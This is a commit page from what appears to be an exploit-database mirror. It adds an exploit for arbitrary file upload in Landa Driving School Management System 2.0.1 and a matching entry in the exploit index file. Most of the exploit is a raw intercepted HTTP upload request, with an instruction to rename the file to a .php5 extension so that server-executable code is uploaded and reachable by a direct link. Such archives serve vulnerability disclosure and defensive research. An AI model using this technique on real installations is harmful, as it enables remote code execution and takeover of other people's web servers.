bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-01-25

Browse source 
1 changes to exploits/shellcodes

Landa Driving School Management System 2.0.1 - Arbitrary File Upload
This commit is contained in:
Offensive Security 2022-01-25 05:02:04 +00:00
parent 034f9fe70c
commit 852da66bed
2 changed files with 47 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

46
exploits/php/webapps/50681.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload
# Version 2.0.1
# Google Dork: N/A
# Date: 17/01/2022
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw
details
POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="name"
sddd
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="csrf-token"
e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="userid"
91
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5
Content-Type: image/png
you will have a direct link to the uploaded files

1
files_exploits.csv
View file

@ -44758,3 +44758,4 @@ id,file,description,date,author,type,platform,port
50676,exploits/php/webapps/50676.txt,"uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50681,exploits/php/webapps/50681.txt,"Landa Driving School Management System 2.0.1 - Arbitrary File Upload",1970-01-01,"Sohel Yousef",webapps,php,

Can't render this file because it is too large.